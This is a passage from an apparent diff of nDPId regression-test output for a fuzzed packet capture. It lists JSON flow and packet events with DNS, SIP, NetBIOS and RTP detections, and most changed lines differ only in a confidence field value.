-00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470971822,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470971822,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":612,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470971852} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":612,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470971822,"pkt":"ADBUADRWAODtAW69CABFAGVIa\/AAAIARS2HAqAECwKgBAQr+ADUANOrBPwUBAAABAAAACAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":1120470975858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470975858,"pkt":"ADBUADRWAODtAW69CABFAABIa\/IAAIARS1\/AqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABF9zaWIEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":614,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470966852,"flow_last_seen":1120470975858,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sib._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":614,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470966852,"flow_last_seen":1120470975858,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sib._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00618{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470781608,"flow_last_seen":1120470781608,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00603{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470781608,"flow_last_seen":1120470781608,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470788806,"flow_last_seen":1120470788806,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.129","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470779487,"flow_last_seen":1120470782692,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1120470983860,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470983860,"pkt":"ADBUADRWAODtAW69CABFAABEa\/cAAIARS17AqAECwKgBAQr\/ADUAMJu6iQWqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 
-00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":170,"num_answers":254,"reply_code":10,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470983860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":170,"num_answers":254,"reply_code":10,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":616,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470983861} 
00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":616,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470983860,"pkt":"AODtam69ADBUADRWCABFAABLAABcAEARtz7AqAEBhagBAgA1Cv8AR342iQWAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983999,"flow_last_seen":1120470983999,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470983999,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1120470983999,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470983999,"pkt":"ADBUADRWAODtAW69CABFAABIa\/kAAIARS1jAqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABOxzaXAEX3VkcANzaHAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983999,"flow_last_seen":1120470983999,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470983999,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"?sip._udp.shp.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470983999,"flow_last_seen":1120470983999,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470983999,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"?sip._udp.shp.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":622,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":200000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1120470984353,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1120470984353,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":366,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":366,"pkt_l4_len":332,"thread_ts_msec":1120470984353,"pkt":"ADBUADRWAODt4G69CABFAAFga\/oAAIARFdPAqAEC1PIhyRPEE8QBRC7GQUNLIHNpcDozNTEwNDcwNEBzaXAuY3liZXJjaXR5LmRrIFNJUC8yLjANCkZyb206ICJhcmlrIiA8c2lwOjM1MTA0qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 
-00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":200000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1120470984353,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":200000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1120470984353,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":2,"flow_last_seen":1120470985234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470985234,"pkt":"ADBUADTZAODtAW69CABFAABIa\/sAAIARS1bAqAECwKgBAQsAADUANFW+1AYBAAABAAAAAAAABF9zaXAEX3VkUQNzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":623,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470983999,"flow_last_seen":1120470985234,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470985234,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udq.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":623,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470983999,"flow_last_seen":1120470985234,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470985234,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udq.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1120470985348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985348,"pkt":"ADBUADRWAODtAW69CABFAADIa\/wAAIARFmjAqAED1PIhJHUwncgAHRjegAhvrgAABNg3lstx1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1U\/V1dXV1REEHBgYEhIeEBQXahMcGAQEBQYBAQAHBQUZEwUbGRATGQUEBAcDAgMDAAACDQ0NAAEDDQwNAAABAgMBBgYBDw4eDAMABwYAAwMGBwEEBgYbHxwRaWBiFBEQFGoTFWBpYX10UltZ10dcVlJVREtCdatzeFp8bmgUag=="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":625,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985418,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1120470985418,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985418,"pkt":"ADBUNjRWAODtAW69CABFAADIa\/0AAIARFmfAqAECJXMAJHUwncgAtL+rgAhvrwAABXg3lstxbmgVFGoUFBVpYG5qbG5kbGoWF2xubWBmfn9Fxsnw\/Ofz+uXwy+phC83k+sJTdF9CW\/bw8vzg7pfo8ldaT011Z399ZmV0dUN4S0dVQ2dmbWNsZGZkeGRvbxQUbBcRExAXEBwfHRAQFhAQHxwfGR4YEBcSFGxibWNqFRUXbmV3ckDQ93N9fmJnYmoVahcVZa9xWll+YGZ6cnJJZXpgeF1EQg=="} 
-00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985418,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985418,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985421,"flow_last_seen":1120470985421,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
